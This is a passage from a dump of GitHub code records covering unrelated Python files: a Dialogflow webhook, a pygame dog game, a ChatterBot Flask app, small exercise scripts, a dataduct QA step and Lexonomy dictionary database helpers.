\"Feedback\":\n baseurl = \"https://hooks.zapier.com/hooks/catch/3544928/wvzqh2/\"\n r = requests.post(baseurl, data=json.dumps(req))\n elif req.get(\"result\").get(\"action\") == \"RegisterOnline\":\n baseurl = \"https://hooks.zapier.com/hooks/catch/3544928/wvk6pa/\"\n r = requests.post(baseurl, data=json.dumps(req))\n return responseMessage\n\n\nif __name__ == '__main__':\n port = int(os.getenv('PORT', 5000))\n app.run(debug=False, port=port, host='0.0.0.0')\n","repo_name":"pnbao/DialogflowWebhook","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"33659002991","text":"import pygame as pg\n\n# Load image resources\nIMG_EATING = pg.transform.scale(pg.image.load('./images/dog_eating.png'), (200, 100))\nIMG_MOVING = pg.transform.scale(pg.image.load('./images/dog_move.png'), (200, 100))\nIMG_SLEEPING = pg.transform.scale(pg.image.load('./images/dog_sleeping.png'), (200, 100))\n\n# Initialize variables for later use\nmsg = None\nplayAgainDisplayed = False\n\ndef handle(btns, nova, wolf, window):\n \"\"\"Handles all game events such as button clicks and UI updates\"\"\"\n\n for event in pg.event.get():\n # If the close button is clicked, stop the game\n if event.type == pg.constants.QUIT: quit(200)\n\n # Runs when a mouse button is released\n if event.type == pg.constants.MOUSEBUTTONUP:\n pos = pg.mouse.get_pos() # Position of mouse on screen\n\n # If game isn't done, accept button clicks\n if not playAgainDisplayed:\n # Declare msg globally\n # Reset msg on every click\n global msg\n msg = None\n\n eat, jog, run, sleep = 0, 1, 2, 3 # Position of each button in btns\n\n # Check if/what button was clicked\n # Verify that the action can be done\n # Call the method for the button\n # Call the method for Wolf's move\n # Play the animation for the action\n\n if btns[eat].collidepoint(pos):\n if nova.hunger < nova.maxHunger:\n nova.Eat()\n wolf.ChooseAction()\n\n animateAction(\"eat\", window, nova, wolf)\n else: msg = f\"Nova is full. The wolves are {abs(nova.dist - wolf.dist)}km away!\"\n\n if btns[jog].collidepoint(pos):\n nova.Jog()\n wolf.ChooseAction()\n\n animateAction(\"jog\", window, nova, wolf)\n\n if btns[run].collidepoint(pos):\n nova.Run()\n wolf.ChooseAction()\n\n animateAction(\"run\", window, nova, wolf)\n\n if btns[sleep].collidepoint(pos):\n if nova.sleep < nova.maxSleep:\n nova.Sleep()\n wolf.ChooseAction()\n \n animateAction(\"sleep\", window, nova, wolf)\n else: msg = f\"Nova isn't tired. The wolves are {abs(nova.dist - wolf.dist)}km away!\"\n # If game is done, only accept play again\n elif btnPlayAgain.collidepoint(pos): playAgain()\n\ndef isDead(nova, wolf, window):\n \"\"\"Checks if Nova is dead and sets the output message to reflect her death\"\"\"\n\n global msg\n\n if wolf.dist >= nova.dist: msg = \"Nova died! The wolves caught her, but she was a tasty snack!\"\n elif nova.health <= 0: msg = \"Nova died! She ran out of health!\"\n elif nova.hunger <= 0: msg = \"Nova died! She ran out of hunger!\"\n elif nova.energy <= 0: msg = \"Nova died! She ran out of energy!\"\n elif nova.sleep <= 0: msg = \"Nova died! She ran out of sleep!\"\n else: return False\n\n return True\n\ndef isWon(nova, window):\n \"\"\"Checks if Nova has won and sets the output message to reflect that\"\"\"\n\n if nova.dist >= 200:\n global msg\n \n msg = \"Nova won! She made it home safely thanks to your help!\"\n return True\n\ndef forestOverlay(window):\n \"\"\"Covers screen with forest image to hide previous frame\"\"\"\n\n bg = pg.transform.scale(pg.image.load(\"./images/ForestBG.jpg\"), (500, 300)) # Load and size the image\n window.blit(bg, (0, 0)) # Output the image\n\ndef updateStatus(window, nova):\n \"\"\"Updates the status bar to reflect Nova's stats\"\"\"\n\n # Add status bar to screen\n bar = pg.Surface((500, 50)).convert_alpha() # Create and size the status bar\n bar.fill((200, 255, 0, 100)) # Color the status bar\n window.blit(bar, (0, 0)) # Output status bar\n\n # Add Nova's status to the status bar\n font = pg.font.SysFont('cambria', 15) # Font object for text\n status = font.render(str(nova), True, (0, 0, 0)) # Nova's attributes rendered from class' __repr__()\n width, height = status.get_width(), status.get_height() # Get the size of the text for use in centering it\n window.blit(status, (250 - width / 2, 25 - height / 2)) # Output the status to the status bar (centered)\n\ndef handleOutput(window, nova, wolf):\n \"\"\"Handles message output by calling outputMsg() with the output message (if it exists) or the default message\"\"\"\n\n outputMsg(window, msg) if msg else outputMsg(window, f\"The wolves are {abs(nova.dist - wolf.dist)}km away!\")\n\ndef outputMsg(window, msg):\n \"\"\"Outputs the message from handleOutput() to the output bar\"\"\"\n\n # Add output bar to screen\n bar = pg.Surface((500, 50)).convert_alpha() # Create and size the output bar\n bar.fill((200, 255, 0, 130)) # Color the output\n window.blit(bar, (0, 250)) # Output the output bar\n\n # Add output to the output bar\n font = pg.font.SysFont('cambria', 15) # Font object for text\n output = font.render(f\">> {msg}\", True, (0, 0, 0)) # Text to output\n height = output.get_height() # Get the size of the text for use in alignment\n window.blit(output, (10, 275 - height / 2)) # Output the text to the output bar\n\ndef animateAction(action, window, nova, wolf):\n \"\"\"Animates an image to reflect the player's action\"\"\"\n\n # Create a dictionary to link actions to images\n actionImgs = {\n \"eat\": IMG_EATING,\n \"jog\": IMG_MOVING,\n \"run\": IMG_MOVING,\n \"sleep\": IMG_SLEEPING\n }\n\n # Get the image for the action\n img = actionImgs[action]\n \n if action == \"jog\" or action == \"run\":\n # Define animation speed\n speed = 2 if action == \"jog\" else 3\n\n x = -200 # Set starting x position for animation\n\n # Runs while the image is still on screen\n while x < 500:\n # Redraw static parts to hide previous frame\n forestOverlay(window)\n updateStatus(window, nova)\n handleOutput(window, nova, wolf)\n\n # Draw the image at the correct position\n window.blit(img, (x, 200 - img.get_height() / 2))\n\n # Update display and increase animation's x position\n pg.display.update()\n x += speed\n else:\n # Initialize variables used for timing\n CLOCK = pg.time.Clock()\n time_elapsed = 0\n\n # While time elapsed is less than animation's FPS * (number of seconds for animation to last)\n while time_elapsed <= 60 * 2:\n # Redraw static parts to hide previous frame\n forestOverlay(window)\n updateStatus(window, nova)\n handleOutput(window, nova, wolf)\n\n # Draw the image at the correct position\n window.blit(img, (250 - img.get_width() / 2, 200 - img.get_height() / 2))\n\n # Add (1/FPS)/second to time_elapsed\n time_elapsed += 1\n\n # Preserve 60 FPS frame rate and update display\n CLOCK.tick(60)\n pg.display.update()\n\ndef showPlayAgainDialogue(window):\n \"\"\"Displays the play again button and dialogue\"\"\"\n\n # Declare variables globally\n global btnPlayAgain, playAgainDisplayed\n\n btnPlayAgain = pg.draw.rect(window, (141, 141, 141), (150, 110, 200, 80)) # Draw the button\n\n # Add text to the play again button\n font = pg.font.SysFont('cambria', 30) # Font object for text\n text = font.render(\"Play Again\", True, (0, 0, 0)) # Text to output\n width, height = text.get_rect().width, text.get_rect().height # Get the size of the text for use in centering it\n window.blit(text, (250 - width / 2, 150 - height / 2)) # Output the text to the play again button (centered)\n\n # Update the game to 'play again screen mode'\n playAgainDisplayed = True\n\ndef playAgain():\n \"\"\"Resets the game variables and GUI and calls the init() method in Main.py\"\"\"\n\n # Declare variables globally\n global playAgainDisplayed, msg\n\n # Remove the play again screen\n playAgainDisplayed = False\n msg = None\n\n # Reinitialize the game\n from Main import init\n init()","repo_name":"BLM16/Homeward-Bound","sub_path":"EventHandler.py","file_name":"EventHandler.py","file_ext":"py","file_size_in_byte":8155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"29154705529","text":"from flask import Flask, render_template, request\r\nfrom chatterbot import ChatBot\r\nfrom chatterbot.trainers import ListTrainer\r\napp = Flask(__name__)\r\nmy_bot = ChatBot(\"Academic_bot\")\r\nconversation=open('conv.txt','r').readlines()\r\n\r\n\r\ntrainer = ListTrainer(my_bot)\r\ntrainer.train(conversation)\r\n\r\n@app.route(\"/\")\r\ndef home():\r\n return render_template('home.html')\r\n\r\n@app.route(\"/get\")\r\ndef get_bot_response():\r\n userText = request.args.get('msg')\r\n return str(my_bot.get_response(userText))\r\n\r\nif __name__ == \"__main__\":\r\n app.debug =True\r\n app.run()","repo_name":"vishi06/Academic-Bot","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"35017563223","text":"#!env/bin/python\n\nimport os\nfrom util import *\n\ndef main():\n if (opts.backend is None):\n backends = [None]\n else:\n backends = opts.backend\n os.system('sbt \"; project pir; publishAll\"')\n for app in opts.app:\n for backend in backends:\n if (backend is not None):\n genDir = \"out/{}/{}\".format(backend, app)\n else:\n genDir = \"out/{}\".format(app)\n\n print(genDir)\n\n os.chdir(genDir)\n ecode = os.system('sbt \"runMain AccelMain {}\"'.format(' '.join(args)))\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"stanford-ppl/pir","sub_path":"bin/pir.py","file_name":"pir.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"54"} +{"seq_id":"29394901138","text":"# -*- coding:utf-8 -*-\n\nfrom api.api import API\nfrom pages.android.common.super_page import SuperPage\nfrom pages.android.ffan.fei_fan_membership_page_configs import FeiFanMembershipPageConfigs as FMPC\nfrom pages.logger import logger\n\n\nclass FeiFanMembershipPage(SuperPage):\n '''\n 作者 宋波\n 首页=>我的飞凡=>我的会员卡包=>飞凡会员\n '''\n def __init__(self, testcase, driver, logger):\n super(FeiFanMembershipPage, self).__init__(testcase, driver, logger)\n\n def validSelf(self):\n '''\n usage: 验证飞凡会员页面\n '''\n logger.info(\"Check 凡会员页面 begin\")\n API().assertElementByResourceId(self.testcase,\n self.driver,\n self.logger,\n FMPC.fei_fan_membership_title,\n FMPC.assert_view_timeout)\n logger.info(\"Check 凡会员页面 end\")\n","repo_name":"liu111xiao111/UItest","sub_path":"pages/android/ffan/fei_fan_membership_page.py","file_name":"fei_fan_membership_page.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"29026820304","text":"def temp_list(list):\r\n avg = sum(list) / len(list)\r\n count_more_avg = 0\r\n count_less_avg = 0\r\n for i in list:\r\n if i > avg:\r\n count_more_avg += 1\r\n elif i <= avg:\r\n count_less_avg += 1\r\n count_pairs = 0\r\n for i in range(0, len(list)):\r\n if i<=len(list)-2:\r\n if (list[i] + list[i + 1]) % 2 == 0:\r\n count_pairs += 1\r\n else:\r\n break\r\n return avg, max(list), min(list), count_more_avg, count_less_avg, count_pairs\r\n","repo_name":"DenisHerzhyk/4_Unit_Test_Python","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24606819373","text":"\"\"\"\nETL step wrapper for QA step can be executed on Ec2 resource\n\"\"\"\nfrom .transform import TransformStep\nfrom ..config import Config\n\nconfig = Config()\n\n\nclass QATransformStep(TransformStep):\n \"\"\"QATransform Step class that helps run scripts on resouces for QA checks\n \"\"\"\n\n def __init__(self,\n id,\n pipeline_name,\n script_arguments=None,\n sns_topic_arn=None,\n **kwargs):\n \"\"\"Constructor for the QATransformStep class\n\n Args:\n sns_arn(str): sns topic arn for QA steps\n script_arguments(list of str): list of arguments to the script\n **kwargs(optional): Keyword arguments directly passed to base class\n \"\"\"\n\n if sns_topic_arn is None:\n sns_topic_arn = config.etl.get('SNS_TOPIC_ARN_WARNING', None)\n\n if script_arguments is None:\n script_arguments = list()\n\n script_arguments.append('--test_name=%s' % (pipeline_name + \".\" + id))\n if sns_topic_arn:\n script_arguments.append('--sns_topic_arn=%s' % sns_topic_arn)\n\n super(QATransformStep, self).__init__(\n id=id,\n script_arguments=script_arguments,\n no_output=True,\n **kwargs)\n\n @classmethod\n def arguments_processor(cls, etl, input_args):\n \"\"\"Parse the step arguments according to the ETL pipeline\n\n Args:\n etl(ETLPipeline): Pipeline object containing resources and steps\n step_args(dict): Dictionary of the step arguments for the class\n \"\"\"\n input_args = cls.pop_inputs(input_args)\n step_args = cls.base_arguments_processor(etl, input_args)\n step_args['pipeline_name'] = etl.name\n\n return step_args\n","repo_name":"coursera/dataduct","sub_path":"dataduct/steps/qa_transform.py","file_name":"qa_transform.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"en","doc_type":"code","stars":251,"dataset":"github-code","pt":"54"} +{"seq_id":"2280069605","text":"products = [] #大清單\nwhile True:\n\tname = input('請輸入商品名稱:')\n\tif name == 'q':\n\t\tbreak\n\tprice = input('請輸入價格名稱:')\n\tproducts.append([name, price])\n\t#p = [name, price] \n\t#p = [] #小清單\n\t#p.append(name)\n\t#p.append(price)\n\t#products.append(p)\nprint(products)\nfor p in products:\n\tprint(p)\n\n","repo_name":"clockhsu1976/products","sub_path":"products.py","file_name":"products.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71981209441","text":"\"\"\"\nhttps://www.hackerrank.com/challenges/python-time-delta/problem\n\nWhen users post an update on social media,such as a URL, image, status update etc., other users in their network are able to view this new post on their news feed. Users can also see exactly when the post was published, i.e, how many hours, minutes or seconds ago.\n\nSince sometimes posts are published and viewed in different time zones, this can be confusing. You are given two timestamps of one such post that a user can see on his newsfeed in the following format:\n\nDay dd Mon yyyy hh:mm:ss +xxxx\n\nHere +xxxx represents the time zone. Your task is to print the absolute difference (in seconds) between them.\n\nInput Format\n\nThe first line contains , the number of testcases.\nEach testcase contains lines, representing time and time .\n\nConstraints\n\n Input contains only valid timestamps\n .\n\nOutput Format\n\nPrint the absolute difference in seconds.\n\nSample Input 0\n\n 2\n Sun 10 May 2015 13:54:36 -0700\n Sun 10 May 2015 13:54:36 -0000\n Sat 02 May 2015 19:54:36 +0530\n Fri 01 May 2015 13:54:36 -0000\n\nSample Output 0\n\n 25200\n 88200\n\nExplanation 0\n\nIn the first query, when we compare the time in UTC for both the time stamps, we see a difference of 7 hours. which is seconds or seconds.\n\nSimilarly, in the second query, time difference is 5 hours and 30 minutes for time zone adjusting for that we have a difference of 1 day and 30 minutes. Or\n\"\"\"\nfrom datetime import datetime, timedelta\n\n\ndef get_date(date_string):\n \"\"\"\n\n :param date_string: Sun 10 May 2015 13:54:36 -0700\n :return:\n \"\"\"\n return datetime.strptime(date_string[:-6], '%a %d %b %Y %H:%M:%S'), date_string[-5], timedelta(hours=int(date_string[-4:-2]), minutes=int(date_string[-2:]))\n\n\ndef get_utc_date(date_string):\n \"\"\"\n\n :param date_string: Sun 10 May 2015 13:54:36 -0700\n :return:\n \"\"\"\n timestamp, tmz, tmz_diff = get_date(date_string)\n timestamp = timestamp + tmz_diff if tmz is '-' else timestamp - tmz_diff\n return timestamp\n\n\nif __name__ == \"__main__\":\n inputs = int(input().strip())\n\n for _ in range(inputs):\n date1, date2 = get_utc_date(input().strip()), get_utc_date(input().strip())\n diff = abs(date1 - date2)\n print(diff.days * 86400 + diff.seconds)\n\n\n\"\"\"\nTest Case:\n\n 2\n Sun 10 May 2015 13:54:36 -0700\n Sun 10 May 2015 13:54:36 -0000\n Sat 02 May 2015 19:54:36 +0530\n Fri 01 May 2015 13:54:36 -0000\n\"\"\"","repo_name":"gahan9/mystuff","sub_path":"hackerrank/python/time_delta.py","file_name":"time_delta.py","file_ext":"py","file_size_in_byte":2451,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"7533655741","text":"from tkinter import *\n\nclass Appli(Frame):\n\n def __init__(self, master):\n super(Appli, self).__init__(master)\n self.grid()\n self.btn_clk=0\n self.btn_clk1=0\n self.create_widget()\n\n def create_widget(self):\n self.btn=Button(self)\n self.btn1=Button(self)\n self.btn2=Button(self)\n self.btn[\"text\"]=\"click:0\"\n self.btn1[\"text\"]=\"Click:0\"\n self.btn2[\"text\"] = \"Reset\"\n self.btn[\"command\"] = self.update_count\n self.btn1[\"command\"] = self.update_count_both\n self.btn2[\"command\"] = self.reset()\n self.btn.grid()\n self.btn1.grid()\n self.btn2.grid()\n\n def update_count(self):\n self.btn_clk+=1\n self.btn[\"text\"] = \"Total Clicks: \"+str(self.btn_clk)\n self.btn1[\"text\"] = \"Total Clicks: \" + str(self.btn_clk1)\n\n def update_count_both(self):\n self.btn_clk+=1\n self.btn_clk1+=1\n self.btn[\"text\"] = \"Total Clicks: \"+str(self.btn_clk)\n self.btn1[\"text\"] = \"Total Clicks: \" + str(self.btn_clk1)\n\n def reset(self):\n self.btn_clk=0\n self.btn_clk1= 0\n self.btn[\"text\"] = \"Total Clicks: \" + str(self.btn_clk)\n self.btn1[\"text\"] = \"Total Clicks: \" + str(self.btn_clk1)\n\nroot=Tk()\nroot.title(\"Click Counter\")\nroot.geometry(\"400x100\")\napp=Appli(root)\nroot.mainloop()\n","repo_name":"StarlordHarsh/Python","sub_path":"Usable Gui.py","file_name":"Usable Gui.py","file_ext":"py","file_size_in_byte":1353,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"36390929397","text":"#!/usr/bin/python3\n\nimport datetime\nimport json\nimport os\nimport os.path\nimport sqlite3\nimport hashlib\nimport random\nimport string\nimport smtplib, ssl\nimport urllib\nimport jwt\nimport shutil\nimport markdown\nimport re\nimport secrets\nfrom collections import defaultdict\n\nsiteconfig = json.load(open(os.environ.get(\"LEXONOMY_SITECONFIG\",\n \"siteconfig.json\"), encoding=\"utf-8\"))\n\ndefaultDictConfig = {\"editing\": {\"xonomyMode\": \"nerd\", \"xonomyTextEditor\": \"askString\" },\n \"searchability\": {\"searchableElements\": []},\n \"xema\": {\"elements\": {}},\n \"titling\": {\"headwordAnnotations\": [], \"abc\": siteconfig[\"defaultAbc\"]},\n \"flagging\": {\"flag_element\": \"\", \"flags\": []}}\n\nprohibitedDictIDs = [\"login\", \"logout\", \"make\", \"signup\", \"forgotpwd\", \"changepwd\", \"users\", \"dicts\", \"oneclick\", \"recoverpwd\", \"createaccount\", \"consent\", \"userprofile\"];\n\n# db management\ndef getDB(dictID):\n conn = sqlite3.connect(os.path.join(siteconfig[\"dataDir\"], \"dicts/\"+dictID+\".sqlite\"))\n conn.row_factory = sqlite3.Row\n conn.executescript(\"PRAGMA journal_mode=WAL; PRAGMA foreign_keys=on\")\n return conn\n\ndef getMainDB():\n conn = sqlite3.connect(os.path.join(siteconfig[\"dataDir\"], 'lexonomy.sqlite'))\n conn.row_factory = sqlite3.Row\n return conn\n\ndef getLinkDB():\n conn = sqlite3.connect(os.path.join(siteconfig[\"dataDir\"], 'crossref.sqlite'))\n conn.row_factory = sqlite3.Row\n return conn\n\n# SMTP\ndef sendmail(mailTo, mailSubject, mailText):\n if siteconfig[\"mailconfig\"] and siteconfig[\"mailconfig\"][\"host\"] and siteconfig[\"mailconfig\"][\"port\"]:\n if siteconfig[\"mailconfig\"][\"secure\"]:\n context = ssl.create_default_context()\n server = smtplib.SMTP_SSL(siteconfig[\"mailconfig\"][\"host\"], siteconfig[\"mailconfig\"][\"port\"], context=context)\n else:\n server = smtplib.SMTP(siteconfig[\"mailconfig\"][\"host\"], siteconfig[\"mailconfig\"][\"port\"])\n message = \"Subject: \" + mailSubject + \"\\n\\n\" + mailText\n server.sendmail(siteconfig[\"mailconfig\"][\"from\"], mailTo, message)\n server.quit()\n\n\n# config\ndef readDictConfigs(dictDB):\n configs = {\"siteconfig\": siteconfig}\n c = dictDB.execute(\"select * from configs\")\n for r in c.fetchall():\n configs[r[\"id\"]] = json.loads(r[\"json\"])\n for conf in [\"ident\", \"publico\", \"users\", \"kex\", \"titling\", \"flagging\",\n \"searchability\", \"xampl\", \"thes\", \"collx\", \"defo\", \"xema\",\n \"xemplate\", \"editing\", \"subbing\", \"download\", \"links\", \"autonumber\"]:\n if not conf in configs:\n configs[conf] = defaultDictConfig.get(conf, {})\n\n for key in configs.keys():\n if type(configs[key]) is dict:\n configs[key] = defaultdict(lambda: None, configs[key])\n\n return configs\n\ndef addSubentryParentTags(db, entryID, xml):\n from xml.dom import minidom, Node\n doc = minidom.parseString(xml)\n els = []\n _els = doc.getElementsByTagName(\"*\")\n els.append(_els[0])\n for i in range(1, len(_els)):\n if _els[i].getAttributeNS(\"http://www.lexonomy.eu/\", \"subentryID\"):\n els.append(_els[i])\n for el in els:\n subentryID = el.getAttributeNS(\"http://www.lexonomy.eu/\", \"subentryID\")\n if el.parentNode.nodeType != Node.ELEMENT_NODE:\n subentryID = entryID\n c = db.execute(\"select s.parent_id, e.title from sub as s inner join entries as e on e.id=s.parent_id where s.child_id=?\", (subentryID,))\n for r in c.fetchall():\n pel = doc.createElementNS(\"http://www.lexonomy.eu/\", \"lxnm:subentryParent\")\n pel.setAttribute(\"id\", str(r[\"parent_id\"]))\n pel.setAttribute(\"title\", r[\"title\"])\n el.appendChild(pel)\n return doc.toxml()\n\ndef removeSubentryParentTags(xml):\n return re.sub(r\"]*>\", \"\", xml)\n\n# auth\ndef verifyLogin(email, sessionkey):\n conn = getMainDB()\n now = datetime.datetime.utcnow()\n yesterday = now - datetime.timedelta(days=1)\n email = email.lower()\n c = conn.execute(\"select email, ske_apiKey, ske_username, apiKey, consent from users where email=? and sessionKey=? and sessionLast>=?\", (email, sessionkey, yesterday))\n user = c.fetchone()\n if not user:\n return {\"loggedin\": False, \"email\": None}\n conn.execute(\"update users set sessionLast=? where email=?\", (now, email))\n conn.commit()\n ret = {\"loggedin\": True, \"email\": email, \"isAdmin\": email in siteconfig[\"admins\"],\n \"ske_username\": user[\"ske_username\"], \"ske_apiKey\": user[\"ske_apiKey\"],\n \"apiKey\": user[\"apiKey\"], \"consent\": user[\"consent\"] == 1}\n return ret\n\ndef verifyLoginAndDictAccess(email, sessionkey, dictDB):\n ret = verifyLogin(email, sessionkey)\n configs = readDictConfigs(dictDB)\n dictAccess = configs[\"users\"].get(email)\n if ret[\"loggedin\"] == False or (not dictAccess and (not \"isAdmin\" in ret or not ret[\"isAdmin\"])):\n return {\"loggedin\": ret[\"loggedin\"], \"email\": email, \"dictAccess\": False, \"isAdmin\": False}, configs\n ret[\"dictAccess\"] = dictAccess\n for r in [\"canEdit\", \"canConfig\", \"canDownload\", \"canUpload\"]:\n ret[r] = ret.get(\"isAdmin\") or (dictAccess and dictAccess[r])\n return ret, configs\n\ndef deleteEntry(db, entryID, email):\n # tell my parents that they need a refresh:\n db.execute (\"update entries set needs_refresh=1 where id in (select parent_id from sub where child_id=?)\", (entryID,))\n # delete me:\n db.execute (\"delete from entries where id=?\", (entryID,))\n # tell history that I have been deleted:\n db.execute (\"insert into history(entry_id, action, [when], email, xml) values(?,?,?,?,?)\",\n (entryID, \"delete\", datetime.datetime.utcnow(), email, None))\n db.commit()\n\ndef readEntry(db, configs, entryID):\n c = db.execute(\"select * from entries where id=?\", (entryID,))\n row = c.fetchone()\n if not row:\n return 0, \"\", \"\"\n xml = setHousekeepingAttributes(entryID, row[\"xml\"], configs[\"subbing\"])\n if configs[\"subbing\"]:\n xml = addSubentryParentTags(db, entryID, xml)\n if configs[\"links\"]:\n xml = updateEntryLinkables(db, entryID, xml, configs, False, False)\n return entryID, xml, row[\"title\"]\n\ndef createEntry(dictDB, configs, entryID, xml, email, historiography):\n if configs[\"titling\"].get(\"abc\") and configs[\"titling\"].get(\"abc\") != \"\":\n abc = configs[\"titling\"].get(\"abc\")\n else:\n abc = configs[\"siteconfig\"][\"defaultAbc\"]\n xml = setHousekeepingAttributes(entryID, xml, configs[\"subbing\"])\n xml = removeSubentryParentTags(xml)\n title = getEntryTitle(xml, configs[\"titling\"])\n sortkey = toSortKey(getSortTitle(xml, configs[\"titling\"]), abc)\n doctype = getDoctype(xml)\n needs_refac = 1 if len(list(configs[\"subbing\"].keys())) > 0 else 0\n needs_resave = 1 if configs[\"searchability\"].get(\"searchableElements\") and len(configs[\"searchability\"].get(\"searchableElements\")) > 0 else 0\n # entry title already exists?\n c = dictDB.execute(\"select id from entries where title = ? and id <> ?\", (title, entryID))\n r = c.fetchone()\n feedback = {\"type\": \"saveFeedbackHeadwordExists\", \"info\": r[\"id\"]} if r else None\n if entryID:\n sql = \"insert into entries(id, xml, title, sortkey, needs_refac, needs_resave, doctype) values(?, ?, ?, ?, ?, ?, ?)\"\n params = (entryID, xml, title, sortkey, needs_refac, needs_resave, doctype)\n else:\n sql = \"insert into entries(xml, title, sortkey, needs_refac, needs_resave, doctype) values(?, ?, ?, ?, ?, ?)\"\n params = (xml, title, sortkey, needs_refac, needs_resave, doctype)\n c = dictDB.execute(sql, params)\n entryID = c.lastrowid\n dictDB.execute(\"insert into searchables(entry_id, txt, level) values(?, ?, ?)\", (entryID, getEntryTitle(xml, configs[\"titling\"], True), 1))\n dictDB.execute(\"insert into history(entry_id, action, [when], email, xml, historiography) values(?, ?, ?, ?, ?, ?)\", (entryID, \"create\", str(datetime.datetime.utcnow()), email, xml, json.dumps(historiography)))\n dictDB.commit()\n return entryID, xml, feedback\n\ndef updateEntry(dictDB, configs, entryID, xml, email, historiography):\n c = dictDB.execute(\"select id, xml from entries where id=?\", (entryID, ))\n row = c.fetchone()\n if configs[\"titling\"].get(\"abc\") and configs[\"titling\"].get(\"abc\") != \"\":\n abc = configs[\"titling\"].get(\"abc\")\n else:\n abc = configs[\"siteconfig\"][\"defaultAbc\"]\n xml = setHousekeepingAttributes(entryID, xml, configs[\"subbing\"])\n xml = removeSubentryParentTags(xml)\n newxml = re.sub(r\" xmlns:lxnm=[\\\"\\']http:\\/\\/www\\.lexonomy\\.eu\\/[\\\"\\']\", \"\", xml)\n newxml = re.sub(r\"(\\=)\\\"([^\\\"]*)\\\"\", r\"\\1'\\2'\", newxml)\n newxml = re.sub(r\" lxnm:(sub)?entryID='[0-9]+'\", \"\", newxml)\n newxml = re.sub(r\" lxnm:linkable='[^']+'\", \"\", newxml)\n if not row:\n adjustedEntryID, adjustedXml, feedback = createEntry(dictDB, configs, entryID, xml, email, historiography)\n if configs[\"links\"]:\n adjustedXml = updateEntryLinkables(dictDB, adjustedEntryID, adjustedXml, configs, True, True)\n return adjustedEntryID, adjustedXml, True, feedback\n else:\n oldxml = row[\"xml\"]\n oldxml = re.sub(r\" xmlns:lxnm=[\\\"\\']http:\\/\\/www\\.lexonomy\\.eu\\/[\\\"\\']\", \"\", oldxml)\n oldxml = re.sub(r\"(\\=)\\\"([^\\\"]*)\\\"\", r\"\\1'\\2'\", oldxml)\n oldxml = re.sub(r\" lxnm:(sub)?entryID='[0-9]+'\", \"\", oldxml)\n oldxml = re.sub(r\" lxnm:linkable='[^']+'\", \"\", oldxml)\n if oldxml == newxml:\n return entryID, xml, False, None\n else:\n dictDB.execute(\"update entries set needs_refresh=1 where id in (select parent_id from sub where child_id=?)\", (entryID,))\n title = getEntryTitle(xml, configs[\"titling\"])\n sortkey = toSortKey(getSortTitle(xml, configs[\"titling\"]), abc)\n doctype = getDoctype(xml)\n needs_refac = 1 if len(list(configs[\"subbing\"].keys())) > 0 else 0\n needs_resave = 1 if configs[\"searchability\"].get(\"searchableElements\") and len(configs[\"searchability\"].get(\"searchableElements\")) > 0 else 0\n # entry title already exists?\n c = dictDB.execute(\"select id from entries where title = ? and id <> ?\", (title, entryID))\n r = c.fetchone()\n feedback = {\"type\": \"saveFeedbackHeadwordExists\", \"info\": r[\"id\"]} if r else None\n dictDB.execute(\"update entries set doctype=?, xml=?, title=?, sortkey=?, needs_refac=?, needs_resave=? where id=?\", (doctype, xml, title, sortkey, needs_refac, needs_resave, entryID))\n dictDB.execute(\"update searchables set txt=? where entry_id=? and level=1\", (getEntryTitle(xml, configs[\"titling\"], True), entryID))\n dictDB.execute(\"insert into history(entry_id, action, [when], email, xml, historiography) values(?, ?, ?, ?, ?, ?)\", (entryID, \"update\", str(datetime.datetime.utcnow()), email, xml, json.dumps(historiography)))\n dictDB.commit()\n if configs[\"links\"]:\n xml = updateEntryLinkables(dictDB, entryID, xml, configs, True, True)\n return entryID, xml, True, feedback\n\ndef getEntryTitle(xml, titling, plaintext=False):\n if titling.get(\"headwordAnnotationsType\") == \"advanced\" and not plaintext:\n ret = titling[\"headwordAnnotationsAdvanced\"]\n for el in re.findall(r\"%\\([^)]+\\)\", titling[\"headwordAnnotationsAdvanced\"]):\n text = \"\"\n extract = extractText(xml, el[2:-1])\n if len(extract) > 0:\n text = extract[0]\n ret = ret.replace(el, text)\n return ret\n ret = getEntryHeadword(xml, titling.get(\"headword\"))\n if not plaintext:\n ret = \"\" + ret + \"\"\n if titling.get(\"headwordAnnotations\"):\n for hw in titling.get(\"headwordAnnotations\"):\n ret += \" \" if ret != \"\" else \"\"\n ret += \" \".join(extractText(xml, hw))\n return ret\n\ndef getEntryHeadword(xml, headword_elem):\n ret = \"?\"\n arr = extractText(xml, headword_elem)\n if len(arr)>0:\n ret = arr[0]\n else:\n ret = extractFirstText(xml)\n if len(ret) > 255:\n ret = ret[0:255]\n return ret\n\ndef toSortKey_num(match):\n return str(match.group(0)).zfill(15)\n\ndef toSortKey(s, abc):\n keylength = 15\n ret = re.sub(r\"<[<>]+>\", \"\", s).lower()\n pat = r\"[0-9]{1,\" + str(keylength) + \"}\"\n ret = re.sub(pat, toSortKey_num, ret)\n chars = []\n count = 0\n for pos in abc:\n count += 1\n key = \"_\"+str(count).zfill(keylength-1)\n for i, pos2 in enumerate(pos):\n if i > 0:\n count += 1\n chars.append({\"char\":pos2, \"key\": key})\n chars.sort(key=lambda x:len(x[\"char\"]), reverse=True)\n for item in chars:\n if not re.match(r\"^[0-9]$\", item[\"char\"]):\n ret = re.sub(item[\"char\"], item[\"key\"], ret)\n ret = 